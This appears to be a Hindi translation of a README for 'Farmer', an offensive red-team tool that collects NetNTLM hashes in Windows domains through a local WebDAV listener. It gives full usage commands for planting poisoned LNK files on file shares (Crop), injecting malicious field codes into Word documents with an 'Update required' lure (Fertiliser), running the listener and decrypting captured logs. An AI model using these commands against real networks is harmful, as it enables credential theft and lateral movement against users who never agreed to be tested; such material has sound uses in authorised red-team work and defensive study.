
Windows डोमेन में NetNTLM हैश को एक स्थानीय WebDAV सर्वर के माध्यम से एकत्र करता है, जिसमें LNK फ़ाइल विषाक्तता और Office दस्तावेज़ फ़ील्ड कोड इंजेक्शन का उपयोग करके पार्श्व गति और क्रेडेंशियल कैप्चर किया जाता है।
लेखक: @domchell
मैं एक किसान बनना चाहता था, इसलिए मैंने हैश की फसल काटनी शुरू कर दी
Farmer एक विंडोज डोमेन में NetNTLM हैश एकत्र करने की एक परियोजना है। Farmer यह एक स्थानीय WebDAV सर्वर बनाकर प्राप्त करता है जो किसी भी कनेक्ट करने वाले क्लाइंट से WebDAV Mini Redirector को प्रमाणित करने का कारण बनता है।
Farmer के सफल होने के लिए, क्लाइंट को स्थानीय WebDAV सर्वर से कनेक्ट करने में सक्षम होना चाहिए। संभावित चीजें जो इसे रोक सकती हैं उनमें नेटवर्क सेगमेंटेशन और/या विंडोज फायरवॉल शामिल हैं। पहले इनकी जाँच अवश्य करें (संकेत Seatbelt WindowsFirewall)।
Farmer में Crop टूल के लिए एक उप-मॉड्यूल शामिल है, इस टूल का उपयोग LNK फ़ाइलें बनाने के लिए किया जा सकता है जो किसी फ़ोल्डर में ब्राउज़ करने पर WebDAV कनेक्शन शुरू करता है जहाँ LNK संग्रहीत है क्योंकि यह संग्रहीत आइकन को प्रस्तुत करने का प्रयास करेगा।
हमले की अवधारणा यह है कि आपको Crop का उपयोग करके वांछित फ़ाइल शेयरों को LNK फ़ाइल से दूषित करना चाहिए जो Farmer WebDAV सर्वर की ओर इशारा करता है।
उदाहरण के लिए:
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest
जब कोई उपयोगकर्ता \fileserver\Common पर ब्राउज़ करता है, तो एक्सप्लोरर Farmer WebDAV सर्वर से आइकन प्राप्त करने का प्रयास करेगा और ऐसा करने में उपयोगकर्ता का NetNTLM हैश प्रस्तुत करेगा।
Farmer में Fertiliser टूल के लिए एक और उप-मॉड्यूल शामिल है, इस टूल का उपयोग Office दस्तावेज़ों (वर्तमान में केवल docx) को एक दुर्भावनापूर्ण फ़ील्ड कोड से दूषित करने के लिए किया जा सकता है। इससे दस्तावेज़ खोलने पर फ़ील्ड कोड पार्स हो जाता है और आपकी पसंद के WebDAV सर्वर पर हैश लीक हो जाएगा :)
उदाहरण के लिए:
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"
Farmer एक उपयोगकर्ता-परिभाषित पोर्ट पर, निश्चित सेकंड के लिए सुनेगा और आवश्यक होने पर आउटपुट को फ़ाइल सिस्टम पर लिखेगा:
उपयोग:
farmer.exe <port> [seconds] [output]
यदि कोई सेकंड निर्दिष्ट नहीं किया गया है, या इसे 0 पर सेट किया गया है, तो farmer अनिश्चित काल तक चलेगा, उदाहरण के लिए:
farmer.exe 8888 0 c:\windows\temp\test.tmp
Farmer को पोर्ट 8888 पर एक मिनट के लिए चलाने के लिए, निम्न कार्य करें:
farmer.exe 8888 60
यदि आप Farmer लॉग को फ़ाइल सिस्टम पर लिखना चाहते हैं, तो आप Config.key में सेट की गई कुंजी का उपयोग करके लॉग फ़ाइल को AES एन्क्रिप्ट कर सकते हैं और एन्क्रिप्ट बूल को true (डिफ़ॉल्ट false) पर सेट कर सकते हैं।
लॉग फ़ाइल को HarvestCrop टूल से डिक्रिप्ट किया जा सकता है, उदाहरण के लिए:
harvestcrop.exe c:\windows\temp\test.tmp farmer